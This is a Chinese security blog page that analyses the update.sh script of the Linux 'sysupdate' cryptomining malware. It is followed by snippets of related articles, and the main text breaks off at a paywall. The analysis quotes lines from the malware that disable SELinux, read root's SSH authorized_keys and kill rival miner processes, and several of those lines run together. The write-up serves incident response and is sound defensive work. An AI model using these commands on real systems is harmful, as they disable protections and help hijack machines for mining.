linux update.sh,Linux系统sysupdate挖矿病毒之update.sh脚本分析 | CN-SEC 中文网

最新推荐文章于 2023-04-25 12:38:37 发布
最新推荐文章于 2023-04-25 12:38:37 发布
阅读量676 收藏
点赞数
文章标签: linux update.sh

这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。

背景

这次废话不多说,直接上,背景感觉毫无意义。

分析

现象确认

首先确认现象,通过查看系统进程发现存在CPU占用过高的现象,如下图:

9f12fc1950e8cd2adf4a6136c07bac84.png

查看进程信息:

d9df609fc3d03b6dbefbc85cfc4b7847.png

进程关联查看,发现该病毒启动时间是在2020.09.18 10:00:01。

1d282eae011c8567eaa35c762072edfb.png

update.sh脚本分析

通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析。

8e6adf1586624a363887a3dfbdc2756b.png

定义系统变量

关闭selinux防火墙,隐藏输出的错误信息,如果有错误信息就输出到空设备2>/dev/null空设备:

setenforce 0 2>dev/null

关闭selinux:

echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

把内容同步写入磁盘

sync && echo 3 >/proc/sys/vm/drop_caches

设置变量:

crondir='/var/spool/cron/'"$USER"cont=`cat ${crondir}`

查看ssh公钥信息

ssht=`cat /root/.ssh/authorized_keys` #ssht = cat /root/.ssh/authorized_keys

关闭相关病毒程序

使用ps auxf查看所有进程,并针对kinsiing进行查找,awk是tab分割,print $2是取出第二个单词,ps auxf查看进程中第二单词为PID(这里关闭的进程较多,只列举其中一些):

ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I

最低0.47元/天 解锁文章
凛冬之怒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
清除挖矿病毒脚本-(shell6)
u010872015的专栏
07-20 222
shell脚本 #/bin/bash killall kdevtmpfsi killall kinsing killall networkservice killall sysupdate killall sysguard rm -rf /var/tmp/kinsing rm -rf /tmp/kdevtmpfsi crontab -u www -r 添加计时器 */1 * * * * /home/shell/xx.sh 备注 用crontab的计时器工具 安装ki...
update_sh:这是一个用于开发中的 drupal 更新周期的脚本集合。 每个团队成员在从存储库更新代码后运行“update.sh local”命令
06-28
Drupal update.sh 由 undpaul 这是我们现在使用的更新脚本的基本模板,用于在存储库中进行代码更新后更新 Drupal 安装的所有部分。 它用于本地环境以及集成、测试和实时站点以执行不同的任务,以确保按照我们希望的方式配置 drupal 站点。 过去,每当开发人员、测试人员、pm 或任何其他人员想要在自己的环境中运行最新配置时,都必须完成一系列任务以确保配置完全按照预期方式进行设置是。 获取存储库后,例如必须运行 update.php,恢复一些功能,手动删除一些旧字段,运行一些批处理操作,更新搜索索引,......。 除了跟上所有要完成的任务之外,总有可能会错过任务、以错误的顺序执行或使用错误的参数执行。 无法证明任务的执行方式和顺序与更新 drupal 应用程序所需的顺序相同,使其正常运行。 解决办法很简单:消除人为因素。 因此,我们开始在我们工作的每个项目中
update.sh
weixin_30737433的博客
09-27 302
#!/bin/sh #$1:install path $2:hub link ip and portinstall_path=$1if [ -z "$install_path" ]then install_path=$HOMEfiUUID=$2HostID=$3HubIpPort=$4 install_dir="${install_path}/agent60"src_dir="agent60"...
yum-update.sh
知识的力量
09-25 544
#!/bin/sh SERVERS="192.168.199.131 192.168.199.132 192.168.199.134 192.168.199.135 192.168.199.136" PASSWORD=redhat username=root for SERVER in $SERVERS do echo "++++++++++++++++++++++++++"$SERV
roedep_update.sh
03-25
rosdep update更新失败问题解决时,会超时失败,使用这个脚循环执行,直到成功才退出,已测试有机率成功,特别是在下半夜的时候容易点。。。。
update-OpenSSH.sh
11-16
CentOS全版本升级脚本,CentOS6.4-CentOS8.0,顺便升级ssl与其他依赖,一键解决
update_app.rar_8812e update.app_LINUX升级_UPDATE.APP_y210 update.a
09-24
标题中的"update_app.rar_8812e update.app_LINUX升级_UPDATE.APP_y210 update.a"揭示了这次升级是针对8812e设备,并且涉及到Linux系统的更新。8812e可能是一个特定的硬件平台,如Wi-Fi模块或其他通信芯片。`update....
linux-linux更换系统软件源的脚本.zip
02-26
Linux操作系统中,系统软件源是获取更新、安装软件包的主要途径。软件源通常由Linux发行版维护者提供,它们包含了各种预编译的软件包,用户可以通过这些源下载并安装所需的软件。然而,有时默认的软件源可能由于...
Archiconda3-0.2.3-Linux-aarch64.zip
07-23
标题中的"Archiconda3-0.2.3-Linux-aarch64.zip"是一个软件分发包,其中包含了一种特殊版本的Anaconda——Archiconda,版本号为0.2.3,专为Linux操作系统下的aarch64架构(也称为ARM64或AArch64)设计。Anaconda是一...
Anaconda3-2021.05-Linux-x86-64
最新发布
05-07
这是一个Shell脚本,用于在Linux系统上进行Anaconda的安装。运行这个脚本时,用户将被引导完成安装过程,包括设置安装路径、同意许可协议、以及选择是否将Anaconda添加到PATH环境变量中,使得在终端中可以直接调用...
生产环境上线脚本update.sh
weixin_34206899的博客
01-17 410
#!/bin/sh #Author:bobo365 Filelist=" web_trade1 static2 web_portfolio3 web_live4 web_topic5 web_api6 service_console7 service_task8 admin_crm9 admin_admin10 mobile_static11 mo...
updatefile.sh - Linux下代码更新脚本
weixin_30633405的博客
06-30 397
以下写的是一个关于文件上传的代码shell脚本 该篇文章主要有下面几个方面的考虑: 1.文章主要用于在Linux下代码包批量上传; 2.将被覆盖的代码备份做备份,用于兴许做问题查看或者代码的回退(回退须要相应的脚本。暂未编写); 3.当次上传的代码,也做备份,用于做兴许问题跟踪。 下面为更新脚本 转载于:https://www.cnbl...
sh脚本-更新文本内容示例以及解析
毅香雪海的博客
03-22 1340
示例 先看一个示例update.sh,这个示例的目的是入三个参数用来更新同一个目录下的service.sh中的三个参数(_Xmn、_Xms、_XmX)的值。用于实际中调整Jvm的堆大小等 #!/bin/bash #获取文件的当前路径 DIR="$( cd "$(dirname "$0")" && pwd )" #待修改文件路径 EXEC_PATH="${DIR}/service.sh" #jvm xmn值-第一个参数 _PARAM_ONE=$1 #jvm xms值 第二个参数 _PA.
linux脚本(shell)——输入密码脚本和怎么写病毒流氓脚本的思路
m0_48638643的博客
03-19 1484
编写这三个脚本,以及编写脚本的几个难点,统计变量的长度、使用正则去匹配、如何使用awk命令
【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
今天是几号的博客
04-25 2788
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。
/dev/null 2>&1 解释
WEBCODE
11-02 133
/dev/null 2>&1 解释 转载:http://blog.sina.com.cn/s/blog_3e9135710100ghew.html crontab内容 :50 18 5-30 * * /asia/script/myscript.sh 1> /dev/null 2>&1 其中 1> /dev/null 2>&1是...
记录一次在Linux解决sysupdata挖矿病毒过程
The_right_one的博客
05-31 900
记录一次在Linux解决sysupdata挖矿病毒过程 公司项目上线测试时发现有进程后台cpu占用过高,根据进程名称及端口号找到文件所在位置为/etc/sysupdata该文件,网上一查发现是病毒文件对应的还有其他四个文件: updata.sh config.json networkservics sysguerd(该文件未添加i权限可以直接rm -rf 文件名 直接删除) 解决办法 1.先尝试解决 找到病毒文件了现在就是直接删除看看: 很明显这个文件不能删除有权限 网上的方法是使用chat
Igh EthercatMaster利用官方给的update.sh脚本生成其他内核版本的网卡驱动
exat500g的博客
09-11 1026
以igb网卡为例。 进入device/igb目录执行update.sh脚本,按照说明填入内核源码位置,需要提取补丁的版本,需要生成的版本 比如以下命令,提取3.18版本的补丁,从~/develop/linux3.16.7目录提取驱动,打上补丁并命名为3.16版本 ./update.sh ~/develop/linux-3.16.7 3.18 3.16 打补丁的过程中会提示某些项目失败,比如 Hunk #31 FAILED at 6495. Hunk #32 succeeded at 652.
linux启动.sh脚本
09-16
对于Linux系统,启动脚本(也称为启动脚本)通常使用扩展名为.shShell脚本文件。这些脚本文件包含一系列要在系统启动时执行的命令和操作。 要创建一个启动脚本,请按照以下步骤进行操作: 1. 打开文本编辑器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值